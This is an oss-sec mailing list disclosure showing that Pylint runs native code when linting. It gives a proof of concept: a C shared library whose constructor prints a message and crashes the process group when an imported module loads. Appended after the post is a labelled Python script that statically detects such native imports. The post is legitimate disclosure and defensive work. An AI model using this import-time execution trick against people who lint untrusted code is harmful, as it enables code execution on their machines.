oss-sec mailing list archives
Pylint checks not as static as one would think
From: Jakub Wilk <jwilk () jwilk net>
Date: Mon, 29 Sep 2014 14:32:21 +0200
Pylint[0] is advertised as "a static code checker, meaning it can analyse your code without actually running it"[1] and that it "does not import live modules"[1].
This is, unfortunately, far from reality. Here's a PoC:

$ cat moo.py
from _moo import *

$ cat moo.c
#include <stdio.h>
#include <signal.h>

void __attribute__((constructor)) moo()
{
    printf("moo!\n");
    kill(0, SIGSEGV);
}

$ gcc -Wall -shared -fPIC moo.c -o _moo.so
$ pylint moo.py
No config file found, using default configuration
moo!
Segmentation fault

My understanding is that upstream Pylint maintainers consider this behavior intentional[2]. But even then, I think it's a serious documentation flaw.
Should a CVE ID be assigned to this bug? If yes, it should be a CVE-2010-XXXX.
[0] http://www.pylint.org/
[1] http://docs.pylint.org/faq.html#about-pylint
[2] https://bugs.debian.org/591676#28

-- 
Jakub Wilk
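An added example, not part of Jakub's message or of Pylint itself, showing a genuinely static way to spot the condition described above: parse the file with `ast` (nothing is executed), then ask the import machinery where each imported name would resolve without loading it, and report any import that a tool importing live modules from that directory would satisfy with a native extension, whose constructors (like `moo()`) would run at import time. The function names and the constructed sample layout are mine; it assumes Python 3 and that the linted file's directory is first on the import path, as it is when pylint is run from there.

```python
import ast
import importlib.machinery
import tempfile
from pathlib import Path


def imported_names(source: str) -> set[str]:
    """Top-level module names that import statements anywhere in `source`
    would load. Uses the ast only, so no code in `source` is executed."""
    names = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            names.update(alias.name.split(".")[0] for alias in node.names)
        elif isinstance(node, ast.ImportFrom) and node.level == 0 and node.module:
            names.add(node.module.split(".")[0])
    return names


def native_imports(py_file: str) -> dict[str, str]:
    """Imports of `py_file` that resolve to a C extension in the file's own
    directory, mapped to the extension's path. PathFinder.find_spec only
    locates the file (by name and suffix); it never loads it, so a
    constructor such as moo() cannot fire here."""
    path = Path(py_file)
    search_path = [str(path.parent)]
    hits = {}
    for name in sorted(imported_names(path.read_text())):
        spec = importlib.machinery.PathFinder.find_spec(name, search_path)
        if spec is not None and isinstance(
            spec.loader, importlib.machinery.ExtensionFileLoader
        ):
            hits[name] = spec.origin
    return hits


def write_constructed_sample() -> str:
    """Constructed stand-in for the PoC layout: moo.py next to a file named
    like a native extension. Returns the path of moo.py."""
    d = Path(tempfile.mkdtemp())
    (d / "moo.py").write_text("import os\nfrom _moo import *\n")
    # An empty file is enough: the finder matches the suffix and never opens it.
    (d / ("_moo" + importlib.machinery.EXTENSION_SUFFIXES[-1])).write_bytes(b"")
    return str(d / "moo.py")


if __name__ == "__main__":
    sample = write_constructed_sample()
    for name, origin in native_imports(sample).items():
        print(f"{sample}: importing {name!r} would load native code from {origin}")
```

Run it over a checkout before pointing pylint at untrusted code; an empty result means no import in that file is satisfied by a native extension in its own directory.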